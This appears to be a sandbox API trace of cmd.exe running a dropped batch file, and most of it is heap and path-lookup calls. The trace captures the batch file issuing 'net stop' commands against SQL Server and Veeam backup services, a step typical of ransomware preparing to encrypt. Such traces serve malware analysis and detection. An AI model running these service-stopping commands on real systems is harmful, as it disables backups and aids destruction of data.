[0207.672] GetProcessHeap () returned 0x3e0000 [0207.672] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0207.672] GetProcessHeap () returned 0x3e0000 [0207.672] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0207.672] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0207.673] GetProcessHeap () returned 0x3e0000 [0207.673] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0207.673] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.673] GetProcessHeap () returned 0x3e0000 [0207.673] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0207.673] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0207.673] GetProcessHeap () returned 0x3e0000 [0207.673] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0207.673] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.674] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0207.674] GetLastError () returned 0x2 [0207.674] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0207.674] GetLastError () returned 0x2 [0207.675] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.675] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0207.675] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0207.676] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0207.676] GetLastError () returned 0x2 [0207.676] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0207.676] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0207.676] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.677] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0207.677] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0207.677] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0207.677] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0207.677] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQLFDLauncher$SQL_2008 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQLFDLauncher$SQL_2008 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQLFDLauncher$SQL_2008 /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x8e4, dwThreadId=0x8e8)) returned 1 [0207.682] CloseHandle (hObject=0x74) returned 1 [0207.682] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0207.682] GetProcessHeap () returned 0x3e0000 [0207.682] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.682] GetEnvironmentStringsW () returned 0x3f8408* [0207.682] GetProcessHeap () returned 0x3e0000 [0207.682] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.682] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.682] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0207.816] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0207.816] CloseHandle (hObject=0x78) returned 1 [0207.816] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0207.816] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0207.816] GetProcessHeap () returned 0x3e0000 [0207.816] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.816] GetEnvironmentStringsW () returned 0x3f8408* [0207.816] GetProcessHeap () returned 0x3e0000 [0207.816] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.816] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.816] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0207.816] GetProcessHeap () returned 0x3e0000 [0207.816] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.816] GetEnvironmentStringsW () returned 0x3f8408* [0207.816] GetProcessHeap () returned 0x3e0000 [0207.816] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.817] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.817] GetProcessHeap () returned 0x3e0000 [0207.817] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0207.817] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0207.817] _get_osfhandle (_FileHandle=1) returned 0x264 [0207.817] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0207.817] _get_osfhandle (_FileHandle=1) returned 0x264 [0207.817] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0207.817] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0207.817] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0207.817] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0207.817] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0207.818] SetConsoleInputExeNameW () returned 0x1 [0207.818] GetConsoleOutputCP () returned 0x1b5 [0207.818] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0207.818] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.818] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0207.818] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0207.818] _get_osfhandle (_FileHandle=3) returned 0x78 [0207.818] SetFilePointer (in: hFile=0x78, lDistanceToMove=4336, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10f0 [0207.818] GetProcessHeap () returned 0x3e0000 [0207.818] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0207.818] GetProcessHeap () returned 0x3e0000 [0207.818] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0207.818] GetProcessHeap () returned 0x3e0000 [0207.818] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0207.818] GetProcessHeap () returned 0x3e0000 [0207.818] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0207.818] GetProcessHeap () returned 0x3e0000 [0207.818] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0207.818] GetProcessHeap () returned 0x3e0000 [0207.818] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0207.818] GetProcessHeap () returned 0x3e0000 [0207.818] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0207.818] GetProcessHeap () returned 0x3e0000 [0207.818] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0207.819] GetProcessHeap () returned 0x3e0000 [0207.819] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0207.819] GetProcessHeap () returned 0x3e0000 [0207.819] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0207.819] GetProcessHeap () returned 0x3e0000 [0207.819] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0207.819] GetProcessHeap () returned 0x3e0000 [0207.819] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0207.819] GetProcessHeap () returned 0x3e0000 [0207.819] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0207.819] _get_osfhandle (_FileHandle=3) returned 0x78 [0207.819] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10f0 [0207.819] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x7d1, lpOverlapped=0x0) returned 1 [0207.819] SetFilePointer (in: hFile=0x78, lDistanceToMove=4364, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x110c [0207.819] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=28, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop VeeamBackupSvc /y\r\n_2008 /y\r\n/y\r\n\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 28 [0207.819] _get_osfhandle (_FileHandle=3) returned 0x78 [0207.819] GetFileType (hFile=0x78) returned 0x1 [0207.819] _get_osfhandle (_FileHandle=3) returned 0x78 [0207.820] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x110c [0207.820] GetProcessHeap () returned 0x3e0000 [0207.820] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0207.820] GetProcessHeap () returned 0x3e0000 [0207.820] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0207.823] _tell (_FileHandle=3) returned 4364 [0207.823] _close (_FileHandle=3) returned 0 [0207.823] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0207.823] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0207.823] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0207.823] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0207.823] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0207.823] _wcsicmp (_String1="net", _String2="CD") returned 11 [0207.823] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0207.823] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0207.823] _wcsicmp (_String1="net", _String2="REN") returned -4 [0207.823] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0207.823] _wcsicmp (_String1="net", _String2="SET") returned -5 [0207.823] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0207.823] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0207.823] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0207.823] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0207.823] _wcsicmp (_String1="net", _String2="MD") returned 1 [0207.823] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0207.823] _wcsicmp (_String1="net", _String2="RD") returned -4 [0207.823] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0207.823] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0207.823] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0207.823] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0207.823] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0207.824] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0207.824] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0207.824] _wcsicmp (_String1="net", _String2="VER") returned -8 [0207.824] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0207.824] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0207.824] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0207.824] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0207.824] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0207.824] _wcsicmp (_String1="net", _String2="START") returned -5 [0207.824] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0207.824] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0207.824] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0207.824] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0207.824] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0207.824] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0207.824] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0207.824] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0207.824] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0207.824] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0207.824] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0207.824] SetErrorMode (uMode=0x0) returned 0x1 [0207.824] GetProcessHeap () returned 0x3e0000 [0207.824] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0207.825] GetProcessHeap () returned 0x3e0000 [0207.825] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0207.825] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.825] GetProcessHeap () returned 0x3e0000 [0207.825] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0207.825] GetProcessHeap () returned 0x3e0000 [0207.825] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0207.825] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0207.825] GetProcessHeap () returned 0x3e0000 [0207.825] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0207.825] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.826] GetProcessHeap () returned 0x3e0000 [0207.826] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0207.826] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0207.826] GetProcessHeap () returned 0x3e0000 [0207.826] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0207.826] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.827] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0207.827] GetLastError () returned 0x2 [0207.827] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0207.827] GetLastError () returned 0x2 [0207.828] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.828] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0207.828] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0207.829] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0207.829] GetLastError () returned 0x2 [0207.829] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0207.829] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0207.829] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.830] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0207.830] SetErrorMode (uMode=0x0) returned 0x1 [0207.830] GetProcessHeap () returned 0x3e0000 [0207.830] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0207.830] GetProcessHeap () returned 0x3e0000 [0207.830] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0207.831] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.831] GetProcessHeap () returned 0x3e0000 [0207.831] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0207.831] GetProcessHeap () returned 0x3e0000 [0207.831] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0207.831] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0207.831] GetProcessHeap () returned 0x3e0000 [0207.831] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0207.831] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.831] GetProcessHeap () returned 0x3e0000 [0207.831] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0207.832] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0207.832] GetProcessHeap () returned 0x3e0000 [0207.832] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0207.832] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.832] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0207.832] GetLastError () returned 0x2 [0207.833] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0207.833] GetLastError () returned 0x2 [0207.833] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.834] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0207.834] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0207.834] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0207.834] GetLastError () returned 0x2 [0207.835] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0207.835] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0207.835] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.835] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0207.835] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0207.835] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0207.836] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0207.836] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop VeeamBackupSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop VeeamBackupSvc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop VeeamBackupSvc /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x900, dwThreadId=0x904)) returned 1 [0207.852] CloseHandle (hObject=0x78) returned 1 [0207.852] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0207.852] GetProcessHeap () returned 0x3e0000 [0207.852] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.852] GetEnvironmentStringsW () returned 0x3f8408* [0207.852] GetProcessHeap () returned 0x3e0000 [0207.852] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.852] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.852] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0207.997] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0207.997] CloseHandle (hObject=0x74) returned 1 [0207.997] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0207.997] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0207.997] GetProcessHeap () returned 0x3e0000 [0207.997] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.997] GetEnvironmentStringsW () returned 0x3f8408* [0207.997] GetProcessHeap () returned 0x3e0000 [0207.997] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.997] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.997] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0207.997] GetProcessHeap () returned 0x3e0000 [0207.998] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0207.998] GetEnvironmentStringsW () returned 0x3f8408* [0207.998] GetProcessHeap () returned 0x3e0000 [0207.998] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0207.998] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0207.998] 